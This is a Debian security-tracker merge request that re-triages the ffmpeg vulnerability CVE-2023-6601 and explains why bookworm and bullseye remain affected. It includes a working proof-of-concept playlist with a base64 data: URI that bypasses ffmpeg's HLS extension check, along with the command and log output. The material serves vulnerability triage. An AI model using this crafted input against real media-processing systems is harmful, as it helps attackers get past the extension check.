Update CVE-2023-6601/ffmpeg triaging, bookworm and bullseye affected

Carlos Henrique Lima Melararequested to merge
charles/security-tracker:update-ffmpeg-triaging into master

Initially the vulnerability was marked as fixed by 91d96dc, but upstream marked d09f50c as fixing it. After going through the description and reproducer, d09f50c indeed fix the CVE. This commit was never cherry-picked in upstream patch releases of 5.1 or 4.3, so both bookworm and bullseye are vulnerable.

To reproduce the vulnerability in bullseye or bookworm, the following steps can be used:

$ cat >cve-2023-6601.mp4 <<EOF
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:1,
data://text/plain;base64,WEJJThogABAAEAAoDzEPKQ8gD0gPTA9TDyAPVQ9uD3MPYQ9mD2UPIA9GD2kPbA9lDyAPRQ94D3QPZQ9uD3MPaQ9vD24PIA9CD3kPcA9hD3MPcw8=.m3u8
#EXT-X-ENDLIST
EOF
$ ffmpeg -i cve-2023-6601.mp4  output.mp4
ffmpeg version 5.1.8-0+deb12u1 Copyright (c) 2000-2025 the FFmpeg developers
  built with gcc 12 (Debian 12.2.0-14+deb12u1)
  [...]
  libavutil      57. 28.100 / 57. 28.100
  libavcodec     59. 37.100 / 59. 37.100
  libavformat    59. 27.100 / 59. 27.100
  libavdevice    59.  7.100 / 59.  7.100
  libavfilter     8. 44.100 /  8. 44.100
  libswscale      6.  7.100 /  6.  7.100
  libswresample   4.  7.100 /  4.  7.100
  libpostproc    56.  6.100 / 56.  6.100
[hls @ 0x55756f63a840] Opening 'data://text/plain;base64,WEJJThogABAAEAAoDzEPKQ8gD0gPTA9TDyAPVQ9uD3MPYQ9mD2UPIA9GD2kPbA9lDyAPRQ94D3QPZQ9uD3MPaQ9vD24PIA9CD3kPcA9hD3MPcw8=.m3u8' for reading
[hls @ 0x55756f63a840] detected format xbin extension none mismatches allowed extensions in url data://text/plain;base64,WEJJThogABAAEAAoDzEPKQ8gD0gPTA9TDyAPVQ9uD3MPYQ9mD2UPIA9GD2kPbA9lDyAPRQ94D3QPZQ9uD3MPaQ9vD24PIA9CD3kPcA9hD3MPcw8=.m3u8
[hls @ 0x55756f63a840] Error when loading first segment 'data://text/plain;base64,WEJJThogABAAEAAoDzEPKQ8gD0gPTA9TDyAPVQ9uD3MPYQ9mD2UPIA9GD2kPbA9lDyAPRQ94D3QPZQ9uD3MPaQ9vD24PIA9CD3kPcA9hD3MPcw8=.m3u8'
./cve-2023-6601.mp4: Invalid data found when processing input

The Opening 'data://text/plain;base64,WEJJThogABAAEAAoDzEPKQ8gD0gPTA9TDyAPVQ9uD3MPYQ9mD2UPIA9GD2kPbA9lDyAPRQ94D3QPZQ9uD3MPaQ9vD24PIA9CD3kPcA9hD3MPcw8=.m3u8' for reading is the same evidence as described in the bug report section I (HLS Unsafe File Extension Bypass): https://bugzilla.redhat.com/show_bug.cgi?id=2253172#c0

Merge request reports